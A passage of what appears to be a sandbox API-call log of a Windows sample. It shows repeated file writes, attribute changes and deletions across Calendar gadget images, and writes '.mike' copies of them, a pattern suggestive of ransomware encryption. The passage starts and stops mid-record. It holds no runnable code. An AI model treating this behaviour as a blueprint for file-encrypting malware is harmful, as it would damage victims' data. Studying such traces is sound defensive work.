[0131.472] WriteFile (in: hFile=0x284, lpBuffer=0x21b9d50*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21b9d50*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0131.473] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_orange.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_orange.png.mike", lpFilePart=0x0) returned 0x65 [0131.473] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_orange.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_orange.png.mike", lpFilePart=0x0) returned 0x65 [0131.473] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_orange.png", dwFileAttributes=0x80) returned 0 [0131.474] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_orange.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_orange.png", lpFilePart=0x0) returned 0x60 [0131.474] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_orange.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_orange.png.mike", lpFilePart=0x0) returned 0x65 [0131.475] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_orange.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_orange.png.mike", lpFilePart=0x0) returned 0x65 [0131.475] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png", lpFilePart=0x0) returned 0x5e [0131.477] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.477] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png.mike", lpFilePart=0x0) returned 0x63 [0131.478] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png", lpFilePart=0x0) returned 0x5e [0131.478] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png", lpFilePart=0x0) returned 0x5e [0131.478] WriteFile (in: hFile=0x284, lpBuffer=0x21bf628*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21bf628*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0131.480] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0131.482] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png.mike", lpFilePart=0x0) returned 0x63 [0131.482] WriteFile (in: hFile=0x284, lpBuffer=0x21c7db4*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21c7db4*, lpNumberOfBytesWritten=0x2af074*=0xbe0, lpOverlapped=0x0) returned 1 [0131.484] WriteFile (in: hFile=0x284, lpBuffer=0x21cb024*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21cb024*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0131.484] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png.mike", lpFilePart=0x0) returned 0x63 [0131.484] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png.mike", lpFilePart=0x0) returned 0x63 [0131.484] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png", dwFileAttributes=0x80) returned 0 [0131.486] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png", lpFilePart=0x0) returned 0x5e [0131.486] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png.mike", lpFilePart=0x0) returned 0x63 [0131.489] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0131.489] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.490] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single.png", lpFilePart=0x0) returned 0x59 [0131.490] WriteFile (in: hFile=0x284, lpBuffer=0x21d0768*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21d0768*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0131.491] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0131.493] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single.png.mike", lpFilePart=0x0) returned 0x5e [0131.494] WriteFile (in: hFile=0x284, lpBuffer=0x21d6ac8*, nNumberOfBytesToWrite=0x5e0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21d6ac8*, lpNumberOfBytesWritten=0x2af074*=0x5e0, lpOverlapped=0x0) returned 1 [0131.495] WriteFile (in: hFile=0x284, lpBuffer=0x21d9d28*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21d9d28*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0131.496] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single.png", dwFileAttributes=0x80) returned 0 [0131.497] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single.png", lpFilePart=0x0) returned 0x59 [0131.497] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single.png.mike", lpFilePart=0x0) returned 0x5e [0131.500] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.501] WriteFile (in: hFile=0x284, lpBuffer=0x21df4a8*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21df4a8*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0131.502] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0131.504] WriteFile (in: hFile=0x284, lpBuffer=0x21e8828*, nNumberOfBytesToWrite=0xde0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21e8828*, lpNumberOfBytesWritten=0x2af074*=0xde0, lpOverlapped=0x0) returned 1 [0131.506] WriteFile (in: hFile=0x284, lpBuffer=0x21eba98*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21eba98*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0131.506] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_bkg.png", dwFileAttributes=0x80) returned 0 [0131.510] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.511] WriteFile (in: hFile=0x284, lpBuffer=0x21f146c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21f146c*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0131.513] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0131.516] WriteFile (in: hFile=0x284, lpBuffer=0x21fe784*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21fe784*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0131.517] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_bkg_orange.png", dwFileAttributes=0x80) returned 0 [0131.520] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.521] WriteFile (in: hFile=0x284, lpBuffer=0x2204164*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2204164*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0131.524] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0131.526] WriteFile (in: hFile=0x284, lpBuffer=0x220c1e0*, nNumberOfBytesToWrite=0xab0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x220c1e0*, lpNumberOfBytesWritten=0x2af074*=0xab0, lpOverlapped=0x0) returned 1 [0131.528] WriteFile (in: hFile=0x284, lpBuffer=0x220f458*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x220f458*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0131.529] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_orange.png", dwFileAttributes=0x80) returned 0 [0131.530] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_orange.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_single_orange.png.mike")) returned 1 [0131.533] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.534] WriteFile (in: hFile=0x284, lpBuffer=0x22149e8*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x22149e8*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0131.535] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0131.537] WriteFile (in: hFile=0x284, lpBuffer=0x2218d88*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2218d88*, lpNumberOfBytesWritten=0x2af074*=0xe0, lpOverlapped=0x0) returned 1 [0131.538] WriteFile (in: hFile=0x284, lpBuffer=0x221bfc0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x221bfc0*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0131.539] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\corner.png", dwFileAttributes=0x80) returned 0 [0131.543] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.544] WriteFile (in: hFile=0x284, lpBuffer=0x2221388*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2221388*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0131.545] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0131.549] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\curl-hot.png", dwFileAttributes=0x80) returned 0 [0131.552] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.557] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\curl.png", dwFileAttributes=0x80) returned 0 [0131.560] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.564] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\month.png", dwFileAttributes=0x80) returned 0 [0131.567] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.571] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\rings-desk.png", dwFileAttributes=0x80) returned 0 [0131.575] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.579] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\rings-dock.png", dwFileAttributes=0x80) returned 0 [0131.581] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x17b86600, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x17b86600, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.582] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3769c1c, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xb3769c1c, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xb3769c1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x6a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-desk.png", cAlternateFileName="")) returned 1 [0131.582] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7e7160b, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7e7160b, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3769c1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x557, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-dock.png", cAlternateFileName="")) returned 1 [0131.582] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7e9776a, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7e9776a, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3769c1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-today.png", cAlternateFileName="")) returned 1 [0131.582] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f55e45, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7f55e45, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb378fd7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xc9, dwReserved0=0x0, dwReserved1=0x0, cFileName="bNext-disable.png", cAlternateFileName="")) returned 1 [0131.583] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7e9776a, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7e9776a, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb38745bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x19d, dwReserved0=0x0, dwReserved1=0x0, cFileName="bNext-down.png", cAlternateFileName="")) returned 1 [0131.583] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7ebd8c9, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7ebd8c9, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3a174dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x242, dwReserved0=0x0, dwReserved1=0x0, cFileName="bNext-hot.png", cAlternateFileName="")) returned 1 [0131.583] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7ebd8c9, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7ebd8c9, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3a174dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xcb, dwReserved0=0x0, dwReserved1=0x0, cFileName="bNext.png", cAlternateFileName="")) returned 1 [0131.583] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f55e45, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7f55e45, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3a174dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xd9, dwReserved0=0x0, dwReserved1=0x0, cFileName="bPrev-disable.png", cAlternateFileName="")) returned 1 [0131.583] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7ee3a28, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7ee3a28, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3a174dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x199, dwReserved0=0x0, dwReserved1=0x0, cFileName="bPrev-down.png", cAlternateFileName="")) returned 1 [0131.584] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f09b87, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7f09b87, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3aafa5c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x23e, dwReserved0=0x0, dwReserved1=0x0, cFileName="bPrev-hot.png", cAlternateFileName="")) returned 1 [0131.584] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f09b87, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7f09b87, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3ad5bbc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="bPrev.png", cAlternateFileName="")) returned 1 [0131.584] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f7bfa4, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7f7bfa4, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3ad5bbc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x8d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_double.png", cAlternateFileName="")) returned 1 [0131.584] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7fee3c1, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7fee3c1, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3afbd1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, 